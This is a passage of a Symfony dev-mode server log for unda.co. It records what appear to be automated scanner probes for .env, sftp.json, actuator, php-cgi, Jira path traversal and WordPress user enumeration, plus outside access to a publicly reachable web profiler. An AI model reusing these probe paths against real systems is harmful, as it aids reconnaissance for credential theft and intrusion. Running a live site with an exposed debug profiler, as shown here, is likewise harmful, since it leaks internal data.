  557. [2025-12-16 08:35:33] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  558. [2025-12-16 08:35:33] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  559. [2025-12-16 08:35:33] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  560. [2025-12-16 08:35:33] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  561. [2025-12-16 08:35:33] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  562. [2025-12-16 08:35:33] security.DEBUG: Calling Authentication entry point. [] []
  563. [2025-12-16 08:35:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  564. [2025-12-16 08:35:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  565. [2025-12-16 08:35:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  566. [2025-12-16 08:35:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql/api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql/api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  567. [2025-12-16 08:35:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/gql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/gql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  568. [2025-12-16 08:35:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  569. [2025-12-16 08:35:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  570. [2025-12-16 08:35:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  571. [2025-12-16 08:35:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webjars/swagger-ui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webjars/swagger-ui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  572. [2025-12-16 08:35:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  573. [2025-12-16 08:35:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/v1/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/v1/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  574. [2025-12-16 08:35:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  575. [2025-12-16 08:35:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v3/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v3/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  576. [2025-12-16 08:35:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-docs/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-docs/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  577. [2025-12-16 08:35:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  578. [2025-12-16 08:35:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /@vite/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /@vite/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  579. [2025-12-16 08:35:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  580. [2025-12-16 08:35:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /php-cgi/php-cgi.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /php-cgi/php-cgi.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  581. [2025-12-16 08:35:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  582. [2025-12-16 08:35:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  583. [2025-12-16 08:35:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  584. [2025-12-16 08:35:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /debug/default/view"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /debug/default/view\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  585. [2025-12-16 08:35:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/_catalog"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/_catalog\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  586. [2025-12-16 08:35:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  587. [2025-12-16 08:35:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  588. [2025-12-16 08:35:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  589. [2025-12-16 08:35:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_all_dbs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_all_dbs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  590. [2025-12-16 08:36:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.DS_Store"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.DS_Store\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  591. [2025-12-16 08:36:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  592. [2025-12-16 08:36:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  593. [2025-12-16 08:36:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  594. [2025-12-16 08:36:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  595. [2025-12-16 08:36:08] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/?rest_route=%2Fwp%2Fv2%2Fusers%2F","method":"GET"} []
  596. [2025-12-16 08:36:08] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  597. [2025-12-16 08:36:08] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  598. [2025-12-16 08:36:08] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  599. [2025-12-16 08:36:08] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  600. [2025-12-16 08:36:08] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  601. [2025-12-16 08:36:08] security.DEBUG: Calling Authentication entry point. [] []
  602. [2025-12-16 08:46:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?panel=exception","method":"GET"} []
  603. [2025-12-16 08:46:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  604. [2025-12-16 08:49:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1d5ef8","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/1d5ef8?panel=security","method":"GET"} []
  605. [2025-12-16 08:49:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  606. [2025-12-16 08:50:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=validator","method":"GET"} []
  607. [2025-12-16 08:50:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  608. [2025-12-16 08:57:15] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/?fbclid=IwZXh0bgNhZW0CMTEAc3J0YwZhcHBfaWQMMjU2MjgxMDQwNTU4AAEe8PvSDPdFba3AyDlp_BtlNdAYE080HArTAqRtBUWAsNAnKa5WXv2z2ev_eLY_aem_NgYpH0NbObLfGdC3g9g7AA","method":"GET"} []
  609. [2025-12-16 08:57:20] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"17c380","_route":"_wdt"},"request_uri":"https://unda.co/_wdt/17c380","method":"GET"} []
  610. [2025-12-16 09:03:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  611. [2025-12-16 09:12:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  612. [2025-12-16 09:22:20] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  613. [2025-12-16 09:37:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=85.208.48.154&limit=10&method=GET","method":"GET"} []
  614. [2025-12-16 09:37:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=85.208.48.154&limit=10&method=GET","method":"GET"} []
  615. [2025-12-16 09:41:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"07a9c5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/07a9c5","method":"GET"} []
  616. [2025-12-16 09:41:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  617. [2025-12-16 09:42:49] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  618. [2025-12-16 09:42:49] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  619. [2025-12-16 09:42:49] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
